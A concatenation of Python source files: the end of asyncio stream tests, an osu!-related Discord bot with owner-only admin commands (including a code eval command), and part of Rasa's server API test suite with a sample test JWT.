self.assertEqual(msg, b"hello world!\n")
self.assertEqual(messages, [])
@unittest.skipIf(sys.platform == 'win32', "Don't have pipes")
def test_read_all_from_pipe_reader(self):
# See asyncio issue 168. This test is derived from the example
# subprocess_attach_read_pipe.py, but we configure the
# StreamReader's limit so that twice it is less than the size
# of the data writter. Also we must explicitly attach a child
# watcher to the event loop.
code = """\
import os, sys
fd = int(sys.argv[1])
os.write(fd, b'data')
os.close(fd)
"""
rfd, wfd = os.pipe()
args = [sys.executable, '-c', code, str(wfd)]
pipe = open(rfd, 'rb', 0)
reader = asyncio.StreamReader(loop=self.loop, limit=1)
protocol = asyncio.StreamReaderProtocol(reader, loop=self.loop)
transport, _ = self.loop.run_until_complete(
self.loop.connect_read_pipe(lambda: protocol, pipe))
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
try:
asyncio.set_child_watcher(watcher)
create = asyncio.create_subprocess_exec(
*args,
pass_fds={wfd},
)
proc = self.loop.run_until_complete(create)
self.loop.run_until_complete(proc.wait())
finally:
asyncio.set_child_watcher(None)
os.close(wfd)
data = self.loop.run_until_complete(reader.read(-1))
self.assertEqual(data, b'data')
def test_streamreader_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = asyncio.StreamReader()
self.assertIs(reader._loop, self.loop)
def test_streamreaderprotocol_constructor(self):
self.addCleanup(asyncio.set_event_loop, None)
asyncio.set_event_loop(self.loop)
# asyncio issue #184: Ensure that StreamReaderProtocol constructor
# retrieves the current loop if the loop parameter is not set
reader = mock.Mock()
protocol = asyncio.StreamReaderProtocol(reader)
self.assertIs(protocol._loop, self.loop)
def test_drain_raises(self):
# See http://bugs.python.org/issue25441
# This test should not use asyncio for the mock server; the
# whole point of the test is to test for a bug in drain()
# where it never gives up the event loop but the socket is
# closed on the server side.
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
q = queue.Queue()
def server():
# Runs in a separate thread.
with socket.create_server(('localhost', 0)) as sock:
addr = sock.getsockname()
q.put(addr)
clt, _ = sock.accept()
clt.close()
async def client(host, port):
reader, writer = await asyncio.open_connection(host, port)
while True:
writer.write(b"foo\n")
await writer.drain()
# Start the server thread and wait for it to be listening.
thread = threading.Thread(target=server)
thread.setDaemon(True)
thread.start()
addr = q.get()
# Should not be stuck in an infinite loop.
with self.assertRaises((ConnectionResetError, ConnectionAbortedError,
BrokenPipeError)):
self.loop.run_until_complete(client(*addr))
# Clean up the thread. (Only on success; on failure, it may
# be stuck in accept().)
thread.join()
self.assertEqual([], messages)
def test___repr__(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__nondefault_limit(self):
stream = asyncio.StreamReader(loop=self.loop, limit=123)
self.assertEqual("<StreamReader limit=123>", repr(stream))
def test___repr__eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_eof()
self.assertEqual("<StreamReader eof>", repr(stream))
def test___repr__data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'data')
self.assertEqual("<StreamReader 4 bytes>", repr(stream))
def test___repr__exception(self):
stream = asyncio.StreamReader(loop=self.loop)
exc = RuntimeError()
stream.set_exception(exc)
self.assertEqual("<StreamReader exception=RuntimeError()>",
repr(stream))
def test___repr__waiter(self):
stream = asyncio.StreamReader(loop=self.loop)
stream._waiter = asyncio.Future(loop=self.loop)
self.assertRegex(
repr(stream),
r"<StreamReader waiter=<Future pending[\S ]*>>")
stream._waiter.set_result(None)
self.loop.run_until_complete(stream._waiter)
stream._waiter = None
self.assertEqual("<StreamReader>", repr(stream))
def test___repr__transport(self):
stream = asyncio.StreamReader(loop=self.loop)
stream._transport = mock.Mock()
stream._transport.__repr__ = mock.Mock()
stream._transport.__repr__.return_value = "<Transport>"
self.assertEqual("<StreamReader transport=<Transport>>", repr(stream))
def test_IncompleteReadError_pickleable(self):
e = asyncio.IncompleteReadError(b'abc', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.partial, e2.partial)
self.assertEqual(e.expected, e2.expected)
def test_LimitOverrunError_pickleable(self):
e = asyncio.LimitOverrunError('message', 10)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(pickle_protocol=proto):
e2 = pickle.loads(pickle.dumps(e, protocol=proto))
self.assertEqual(str(e), str(e2))
self.assertEqual(e.consumed, e2.consumed)
def test_wait_closed_on_close(self):
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = rd.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
self.assertFalse(wr.is_closing())
wr.close()
self.assertTrue(wr.is_closing())
self.loop.run_until_complete(wr.wait_closed())
def test_wait_closed_on_close_with_unread_data(self):
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address))
wr.write(b'GET / HTTP/1.0\r\n\r\n')
f = rd.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
wr.close()
self.loop.run_until_complete(wr.wait_closed())
def test_async_writer_api(self):
async def inner(httpd):
rd, wr = await asyncio.open_connection(*httpd.address)
wr.write(b'GET / HTTP/1.0\r\n\r\n')
data = await rd.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await rd.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
wr.close()
await wr.wait_closed()
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_async_writer_api_exception_after_close(self):
async def inner(httpd):
rd, wr = await asyncio.open_connection(*httpd.address)
wr.write(b'GET / HTTP/1.0\r\n\r\n')
data = await rd.readline()
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
data = await rd.read()
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
wr.close()
with self.assertRaises(ConnectionResetError):
wr.write(b'data')
await wr.drain()
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
self.loop.run_until_complete(inner(httpd))
self.assertEqual(messages, [])
def test_eof_feed_when_closing_writer(self):
# See http://bugs.python.org/issue35065
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
with test_utils.run_test_server() as httpd:
rd, wr = self.loop.run_until_complete(
asyncio.open_connection(*httpd.address))
wr.close()
f = wr.wait_closed()
self.loop.run_until_complete(f)
assert rd.at_eof()
f = rd.read()
data = self.loop.run_until_complete(f)
assert data == b''
self.assertEqual(messages, [])
if __name__ == '__main__':
unittest.main()
|
bot.py | import discord, os, asyncio, pyosu, textwrap, osu_irc, re
from discord.ext import commands
from helpers.config import config
from helpers.parse import parse_args
from helpers.classify import Classify
from helpers.command import parse_commands, init_commands
from helpers.db import ban_user, get_bugs, get_suggestions, get_users, unban_user, connect_db, log_command, set_last_beatmap, add_user, remove_user, get_banned, get_logs
from helpers.np import pp, process_re
from contextlib import redirect_stdout
from io import StringIO
import multiprocessing as mp
enabled = True
path = os.path.dirname(os.path.realpath(__file__))
api = pyosu.OsuApi(config["osuapikey"])
bot = commands.Bot(command_prefix="!")
@bot.command()
@commands.is_owner()
async def ban(ctx: commands.Context, username, reason=""):
user = await api.get_user(username)
await ban_user(username, user.user_id, reason)
await ctx.send("Banned user!")
@bot.command()
@commands.is_owner()
async def unban(ctx: commands.Context, username):
await unban_user(username)
await ctx.send("Unbanned user!")
@bot.command()
@commands.is_owner()
async def unban_id(ctx: commands.Context, user_id):
await unban_user(None, user_id)
await ctx.send("Unbanned user!")
@bot.command()
@commands.is_owner()
async def bugs(ctx: commands.Context):
result = await get_bugs()
await ctx.send(f"```{result}```")
@bot.command()
@commands.is_owner()
async def suggestions(ctx: commands.Context):
result = await get_suggestions()
await ctx.send(f"```{result}```")
@bot.command()
@commands.is_owner()
async def users(ctx: commands.Context):
users = await get_users()
await ctx.send(f"```{users}```")
@bot.command(name="exec", aliases=["eval"])
@commands.is_owner()
async def _exec(ctx, *, body: str):
def indent(text, amount, ch=' '):
return textwrap.indent(text, amount * ch)
env = {
"bot": bot,
"ctx": ctx,
"channel": ctx.channel,
"author": ctx.author,
"guild": ctx.guild,
"message": ctx.message,
"discord": discord
}
body = indent(body.replace("```py", "").strip("`"), 4)
result = None
to_compile = f"import asyncio\nasync def func():\n{body}\nresult = asyncio.run(func())"
loc = {}
stdout = StringIO()
try:
with redirect_stdout(stdout):
exec(to_compile, env, loc)
except Exception as e:
await ctx.message.add_reaction("❌")
return await ctx.send(f"```\n{e.__class__.__name__}: {e}\n```")
else:
await ctx.message.add_reaction("✅")
result = loc["result"]
stdout = stdout.getvalue()[:-1]
if stdout:
await ctx.send(f"stdout \n```\n{stdout}\n```")
if result:
await ctx.send(f"return value \n```\n{result}\n```")
async def onMessage(msg: osu_irc.Message):
banned = await get_banned(msg.user_name)
if msg.is_private:
args = parse_args(msg.content)
user = await api.get_user(msg.user_name)
if msg.user_name == "BanchoBot":
if msg.content.startswith("You cannot create any more"):
return
global recent_mp_id
mp_id = int(re.findall(r"Created the tournament match https:\/\/osu\.ppy\.sh\/mp\/([0-9]+)", msg.content)[0])
recent_mp_id = mp_id
return
ctx = Classify({ # context object to send to command
"message": msg, # message object
"msg": msg, # alias to message
"username": msg.user_name,
"content": msg.content, # raw message contents (not parsed)
"userid": user.user_id,
"match": None
})
responce = await parse_commands(args, ctx)
if responce: # only send if command detected
async def send_msg():
await add_user(msg.user_name, user.user_id, msg.content) # add user to db
await log_command(msg.user_name, user.user_id, msg.content) # log the message
print(f"TEST Sent {msg.user_name} this \"{responce}\"")
return str(responce)
r = await send_msg()
return r
if msg.content.startswith("is "):
user = await api.get_user(msg.user_name)
print(f"Got /np from {msg.user_name} which contains this \"{msg.content}\"")
await log_command(msg.user_name, user.user_id, msg.content)
# get /np
await add_user(msg.user_name, user.user_id, msg.content)
all = re.findall(r"is playing \[https:\/\/osu\.ppy\.sh\/beatmapsets\/[0-9]+\#(.*)\/([0-9]+) .*\]( .*|)|is listening to \[https:\/\/osu\.ppy\.sh\/beatmapsets\/[0-9]+\#(.*)\/([0-9]+) .*\]|is editing \[https:\/\/osu\.ppy\.sh\/beatmapsets\/[0-9]+\#(.*)\/([0-9]+) .*\]|is watching \[https:\/\/osu\.ppy\.sh\/beatmapsets\/[0-9]+\#(.*)\/([0-9]+) .*\]( .*|)",
str(msg.content))
mods, map_id = process_re(all)
await set_last_beatmap(msg.user_name, map_id)
mode = await api.get_beatmap(beatmap_id=map_id)
result = await pp(map_id, mods, mode.mode)
for r in result.split("\n"):
return r
@bot.command()
@commands.is_owner()
async def msg(ctx: commands.Context, user: str, *, msg: str):
try: message = osu_irc.Message(msg)
except AttributeError: message = osu_irc.Message(" ".join(msg)); err = True
else: err = False
message._user_name = user
if err:
message._content = " ".join(msg)
else:
message._content = msg
r = await onMessage(message)
await ctx.send(f"```{r}```") # fake message
@bot.command(name="add_user")
@commands.is_owner()
async def _add_user(ctx: commands.Context, username, userid, content=""):
await add_user(username, userid, content)
await ctx.send("User added!")
@bot.command(name="remove_user")
@commands.is_owner()
async def _remove_user(ctx: commands.Context, username):
await remove_user(username)
await ctx.send("User removed!")
@bot.command(name="remove_user_id")
@commands.is_owner()
async def _remove_user_id(ctx: commands.Context, userid):
await remove_user(user_id=userid)
await ctx.send("User removed!")
@bot.command(name="logs")
@commands.is_owner()
async def _logs(ctx: commands.Context):
logs = await get_logs()
await ctx.send("```" + str(logs) + "```")
def start_bot():
global pool
asyncio.run(connect_db(asyncio.get_event_loop()))
from helpers.db import pool
bot.run(config["discordbottoken"])
async def init_bot(spookybot):
if not enabled:
return
mp.set_start_method("spawn")
botprocess = mp.Process(target=start_bot)
botprocess.start()
def stop_bot():
bot.logout() |
test_server.py | import os
from multiprocessing.managers import DictProxy
import requests
import time
import tempfile
import uuid
from typing import List, Text, Type, Generator, NoReturn
from contextlib import ExitStack
from _pytest import pathlib
from aioresponses import aioresponses
import pytest
from freezegun import freeze_time
from mock import MagicMock
from multiprocessing import Process, Manager
import rasa
import rasa.constants
import rasa.utils.io
from rasa.core import events, utils
from rasa.core.agent import Agent
from rasa.core.channels import CollectingOutputChannel, RestInput, SlackInput
from rasa.core.channels.slack import SlackBot
from rasa.core.events import Event, UserUttered, SlotSet, BotUttered
from rasa.core.trackers import DialogueStateTracker
from rasa.model import unpack_model
from rasa.utils.endpoints import EndpointConfig
from sanic import Sanic
from sanic.testing import SanicTestClient
from tests.nlu.utilities import ResponseTest
from tests.conftest import get_test_client
# a couple of event instances that we can use for testing
test_events = [
Event.from_parameters(
{
"event": UserUttered.type_name,
"text": "/goodbye",
"parse_data": {
"intent": {"confidence": 1.0, "name": "greet"},
"entities": [],
},
}
),
BotUttered("Welcome!", {"test": True}),
SlotSet("cuisine", 34),
SlotSet("cuisine", "34"),
SlotSet("location", None),
SlotSet("location", [34, "34", None]),
]
@pytest.fixture
def rasa_app_without_api(rasa_server_without_api: Sanic) -> SanicTestClient:
return get_test_client(rasa_server_without_api)
@pytest.fixture
def rasa_app(rasa_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_server)
@pytest.fixture
def rasa_app_nlu(rasa_nlu_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_nlu_server)
@pytest.fixture
def rasa_app_core(rasa_core_server: Sanic) -> SanicTestClient:
return get_test_client(rasa_core_server)
@pytest.fixture
def rasa_secured_app(rasa_server_secured: Sanic) -> SanicTestClient:
return get_test_client(rasa_server_secured)
def test_root(rasa_app: SanicTestClient):
_, response = rasa_app.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_root_without_enable_api(rasa_app_without_api: SanicTestClient):
_, response = rasa_app_without_api.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_root_secured(rasa_secured_app: SanicTestClient):
_, response = rasa_secured_app.get("/")
assert response.status == 200
assert response.text.startswith("Hello from Rasa:")
def test_version(rasa_app: SanicTestClient):
_, response = rasa_app.get("/version")
content = response.json
assert response.status == 200
assert content.get("version") == rasa.__version__
assert (
content.get("minimum_compatible_version")
== rasa.constants.MINIMUM_COMPATIBLE_VERSION
)
def test_status(rasa_app: SanicTestClient, trained_rasa_model: Text):
_, response = rasa_app.get("/status")
model_file = response.json["model_file"]
assert response.status == 200
assert "fingerprint" in response.json
assert os.path.isfile(model_file)
assert model_file == trained_rasa_model
def test_status_nlu_only(rasa_app_nlu: SanicTestClient, trained_nlu_model: Text):
_, response = rasa_app_nlu.get("/status")
model_file = response.json["model_file"]
assert response.status == 200
assert "fingerprint" in response.json
assert "model_file" in response.json
assert model_file == trained_nlu_model
def test_status_secured(rasa_secured_app: SanicTestClient):
_, response = rasa_secured_app.get("/status")
assert response.status == 401
def test_status_not_ready_agent(rasa_app: SanicTestClient):
rasa_app.app.agent = None
_, response = rasa_app.get("/status")
assert response.status == 409
@pytest.fixture
def shared_statuses() -> DictProxy:
return Manager().dict()
@pytest.fixture
def background_server(
shared_statuses: DictProxy, tmpdir: pathlib.Path
) -> Generator[Process, None, None]:
# Create a fake model archive which the mocked train function can return
from pathlib import Path
fake_model = Path(tmpdir) / "fake_model.tar.gz"
fake_model.touch()
fake_model_path = str(fake_model)
# Fake training function which blocks until we tell it to stop blocking
# If we can send a status request while this is blocking, we can be sure that the
# actual training is also not blocking
def mocked_training_function(*_, **__) -> Text:
# Tell the others that we are now blocking
shared_statuses["started_training"] = True
# Block until somebody tells us to not block anymore
while shared_statuses.get("stop_training") is not True:
time.sleep(1)
return fake_model_path
def run_server() -> NoReturn:
import rasa
rasa.train = mocked_training_function
from rasa import __main__
import sys
sys.argv = ["rasa", "run", "--enable-api"]
__main__.main()
server = Process(target=run_server)
yield server
server.terminate()
@pytest.fixture()
def training_request(shared_statuses: DictProxy) -> Generator[Process, None, None]:
def send_request() -> None:
with ExitStack() as stack:
formbot_data = dict(
domain="examples/formbot/domain.yml",
config="examples/formbot/config.yml",
stories="examples/formbot/data/stories.md",
nlu="examples/formbot/data/nlu.md",
)
payload = {
key: stack.enter_context(open(path)).read()
for key, path in formbot_data.items()
}
payload["force"] = True
response = requests.post("http://localhost:5005/model/train", json=payload)
shared_statuses["training_result"] = response.status_code
train_request = Process(target=send_request)
yield train_request
train_request.terminate()
# Due to unknown reasons this test can not be run in pycharm, it
# results in segfaults...will skip in that case - test will still get run on CI.
# It also doesn't run on Windows because of Process-related calls and an attempt
# to start/terminate a process. We will investigate this case further later:
# https://github.com/RasaHQ/rasa/issues/6302
@pytest.mark.skipif("PYCHARM_HOSTED" in os.environ, reason="results in segfault")
@pytest.mark.skip_on_windows
def test_train_status_is_not_blocked_by_training(
background_server: Process, shared_statuses: DictProxy, training_request: Process
):
background_server.start()
def is_server_ready() -> bool:
try:
return requests.get("http://localhost:5005/status").status_code == 200
except Exception:
return False
# wait until server is up before sending train request and status test loop
while not is_server_ready():
time.sleep(1)
training_request.start()
# Wait until the blocking training function was called
while shared_statuses.get("started_training") is not True:
time.sleep(1)
# Check if the number of currently running trainings was incremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == 200
assert response.json()["num_active_training_jobs"] == 1
# Tell the blocking training function to stop
shared_statuses["stop_training"] = True
while shared_statuses.get("training_result") is None:
time.sleep(1)
# Check that the training worked correctly
assert shared_statuses["training_result"] == 200
# Check if the number of currently running trainings was decremented
response = requests.get("http://localhost:5005/status")
assert response.status_code == 200
assert response.json()["num_active_training_jobs"] == 0
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
def test_parse(rasa_app, response_test):
_, response = rasa_app.post(response_test.endpoint, json=response_test.payload)
rjs = response.json
assert response.status == 200
assert all(prop in rjs for prop in ["entities", "intent", "text"])
assert rjs["entities"] == response_test.expected_response["entities"]
assert rjs["text"] == response_test.expected_response["text"]
assert rjs["intent"] == response_test.expected_response["intent"]
@pytest.mark.parametrize(
"response_test",
[
ResponseTest(
"/model/parse?emulation_mode=wit",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=dialogflow",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello",
},
payload={"text": "hello"},
),
ResponseTest(
"/model/parse?emulation_mode=luis",
{
"entities": [],
"intent": {"confidence": 1.0, "name": "greet"},
"text": "hello ńöñàśçií",
},
payload={"text": "hello ńöñàśçií"},
),
],
)
def test_parse_with_different_emulation_mode(rasa_app, response_test):
_, response = rasa_app.post(response_test.endpoint, json=response_test.payload)
assert response.status == 200
def test_parse_without_nlu_model(rasa_app_core: SanicTestClient):
_, response = rasa_app_core.post("/model/parse", json={"text": "hello"})
assert response.status == 200
rjs = response.json
assert all(prop in rjs for prop in ["entities", "intent", "text"])
def test_parse_on_invalid_emulation_mode(rasa_app_nlu: SanicTestClient):
_, response = rasa_app_nlu.post(
"/model/parse?emulation_mode=ANYTHING", json={"text": "hello"}
)
assert response.status == 400
def test_train_stack_success(
rasa_app,
default_domain_path,
default_stories_file,
default_stack_config,
default_nlu_data,
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
stories_file = stack.enter_context(open(default_stories_file))
nlu_file = stack.enter_context(open(default_nlu_data))
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=stories_file.read(),
nlu=nlu_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
assert response.headers["filename"] is not None
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_nlu_success(
rasa_app, default_stack_config, default_nlu_data, default_domain_path
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
nlu_file = stack.enter_context(open(default_nlu_data))
payload = dict(
domain=domain_file.read(), config=config_file.read(), nlu=nlu_file.read()
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_core_success(
rasa_app, default_stack_config, default_stories_file, default_domain_path
):
with ExitStack() as stack:
domain_file = stack.enter_context(open(default_domain_path))
config_file = stack.enter_context(open(default_stack_config))
core_file = stack.enter_context(open(default_stories_file))
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=core_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_with_retrieval_events_success(rasa_app, default_stack_config):
with ExitStack() as stack:
domain_file = stack.enter_context(
open("data/test_domains/default_retrieval_intents.yml")
)
config_file = stack.enter_context(open(default_stack_config))
core_file = stack.enter_context(
open("data/test_stories/stories_retrieval_intents.md")
)
responses_file = stack.enter_context(open("data/test_responses/default.md"))
nlu_file = stack.enter_context(
open("data/test_nlu/default_retrieval_intents.md")
)
payload = dict(
domain=domain_file.read(),
config=config_file.read(),
stories=core_file.read(),
responses=responses_file.read(),
nlu=nlu_file.read(),
)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 200
# save model to temporary file
tempdir = tempfile.mkdtemp()
model_path = os.path.join(tempdir, "model.tar.gz")
with open(model_path, "wb") as f:
f.write(response.body)
# unpack model and ensure fingerprint is present
model_path = unpack_model(model_path)
assert os.path.exists(os.path.join(model_path, "fingerprint.json"))
def test_train_missing_config(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config=None)
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 400
def test_train_missing_training_data(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config="config data")
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 400
def test_train_internal_error(rasa_app: SanicTestClient):
payload = dict(domain="domain data", config="config data", nlu="nlu data")
_, response = rasa_app.post("/model/train", json=payload)
assert response.status == 500
def test_evaluate_stories(rasa_app, default_stories_file):
stories = rasa.utils.io.read_file(default_stories_file)
_, response = rasa_app.post("/model/test/stories", data=stories)
assert response.status == 200
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert not js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
def test_evaluate_stories_not_ready_agent(
rasa_app_nlu: SanicTestClient, default_stories_file
):
stories = rasa.utils.io.read_file(default_stories_file)
_, response = rasa_app_nlu.post("/model/test/stories", data=stories)
assert response.status == 409
def test_evaluate_stories_end_to_end(rasa_app, end_to_end_story_file):
stories = rasa.utils.io.read_file(end_to_end_story_file)
_, response = rasa_app.post("/model/test/stories?e2e=true", data=stories)
assert response.status == 200
js = response.json
assert set(js.keys()) == {
"report",
"precision",
"f1",
"accuracy",
"actions",
"in_training_data_fraction",
"is_end_to_end_evaluation",
}
assert js["is_end_to_end_evaluation"]
assert set(js["actions"][0].keys()) == {
"action",
"predicted",
"confidence",
"policy",
}
def test_evaluate_intent(rasa_app, default_nlu_data):
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app.post("/model/test/intents", data=nlu_data)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
def test_evaluate_intent_on_just_nlu_model(
rasa_app_nlu: SanicTestClient, default_nlu_data
):
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app_nlu.post("/model/test/intents", data=nlu_data)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
def test_evaluate_intent_with_query_param(
rasa_app, trained_nlu_model, default_nlu_data
):
_, response = rasa_app.get("/status")
previous_model_file = response.json["model_file"]
nlu_data = rasa.utils.io.read_file(default_nlu_data)
_, response = rasa_app.post(
f"/model/test/intents?model={trained_nlu_model}", data=nlu_data
)
assert response.status == 200
assert set(response.json.keys()) == {
"intent_evaluation",
"entity_evaluation",
"response_selection_evaluation",
}
_, response = rasa_app.get("/status")
assert previous_model_file == response.json["model_file"]
def test_predict(rasa_app: SanicTestClient):
data = {
"Events": {
"value": [
{"event": "action", "name": "action_listen"},
{
"event": "user",
"text": "hello",
"parse_data": {
"entities": [],
"intent": {"confidence": 0.57, "name": "greet"},
"text": "hello",
},
},
]
}
}
_, response = rasa_app.post(
"/model/predict", json=data, headers={"Content-Type": "application/json"}
)
content = response.json
assert response.status == 200
assert "scores" in content
assert "tracker" in content
assert "policy" in content
@freeze_time("2018-01-01")
def test_requesting_non_existent_tracker(rasa_app: SanicTestClient):
_, response = rasa_app.get("/conversations/madeupid/tracker")
content = response.json
assert response.status == 200
assert content["paused"] is False
assert content["slots"] == {"name": None}
assert content["sender_id"] == "madeupid"
assert content["events"] == [
{
"event": "action",
"name": "action_session_start",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
},
{"event": "session_started", "timestamp": 1514764800},
{
"event": "action",
"name": "action_listen",
"policy": None,
"confidence": None,
"timestamp": 1514764800,
},
]
assert content["latest_message"] == {
"text": None,
"intent": {},
"entities": [],
"message_id": None,
"metadata": {},
}
@pytest.mark.parametrize("event", test_events)
def test_pushing_event(rasa_app: SanicTestClient, event: Event):
sender_id = str(uuid.uuid1())
conversation = f"/conversations/{sender_id}"
serialized_event = event.as_dict()
# Remove timestamp so that a new one is assigned on the server
serialized_event.pop("timestamp")
time_before_adding_events = time.time()
_, response = rasa_app.post(
f"{conversation}/tracker/events",
json=serialized_event,
headers={"Content-Type": "application/json"},
)
assert response.json is not None
assert response.status == 200
_, tracker_response = rasa_app.get(f"/conversations/{sender_id}/tracker")
tracker = tracker_response.json
assert tracker is not None
assert len(tracker.get("events")) == 1
evt = tracker.get("events")[0]
deserialised_event = Event.from_parameters(evt)
assert deserialised_event == event
assert deserialised_event.timestamp > time_before_adding_events
def test_push_multiple_events(rasa_app: SanicTestClient):
conversation_id = str(uuid.uuid1())
conversation = f"/conversations/{conversation_id}"
events = [e.as_dict() for e in test_events]
_, response = rasa_app.post(
f"{conversation}/tracker/events",
json=events,
headers={"Content-Type": "application/json"},
)
assert response.json is not None
assert response.status == 200
_, tracker_response = rasa_app.get(f"/conversations/{conversation_id}/tracker")
tracker = tracker_response.json
assert tracker is not None
# there is also an `ACTION_LISTEN` event at the start
assert tracker.get("events") == events
def test_put_tracker(rasa_app: SanicTestClient):
data = [event.as_dict() for event in test_events]
_, response = rasa_app.put(
"/conversations/pushtracker/tracker/events",
json=data,
headers={"Content-Type": "application/json"},
)
content = response.json
assert response.status == 200
assert len(content["events"]) == len(test_events)
assert content["sender_id"] == "pushtracker"
_, tracker_response = rasa_app.get("/conversations/pushtracker/tracker")
tracker = tracker_response.json
assert tracker is not None
evts = tracker.get("events")
assert events.deserialise_events(evts) == test_events
def test_sorted_predict(rasa_app: SanicTestClient):
_create_tracker_for_sender(rasa_app, "sortedpredict")
_, response = rasa_app.post("/conversations/sortedpredict/predict")
scores = response.json["scores"]
sorted_scores = sorted(scores, key=lambda k: (-k["score"], k["action"]))
assert scores == sorted_scores
def _create_tracker_for_sender(app: SanicTestClient, sender_id: Text) -> None:
data = [event.as_dict() for event in test_events[:3]]
_, response = app.put(
f"/conversations/{sender_id}/tracker/events",
json=data,
headers={"Content-Type": "application/json"},
)
assert response.status == 200
def test_get_tracker_with_jwt(rasa_secured_app):
# token generated with secret "core" and algorithm HS256
# on https://jwt.io/
# {"user": {"username": "testadmin", "role": "admin"}}
jwt_header = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
"eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdGFkbWluIiwic"
"m9sZSI6ImFkbWluIn19.NAQr0kbtSrY7d28XTqRzawq2u"
"QRre7IWTuIDrCn5AIw"
}
_, response = rasa_secured_app.get(
"/conversations/testadmin/tracker", headers=jwt_header
)
assert response.status == 200
_, response = rasa_secured_app.get(
"/conversations/testuser/tracker", headers=jwt_header
)
assert response.status == 200
# {"user": {"username": "testuser", "role": "user"}}
jwt_header = {
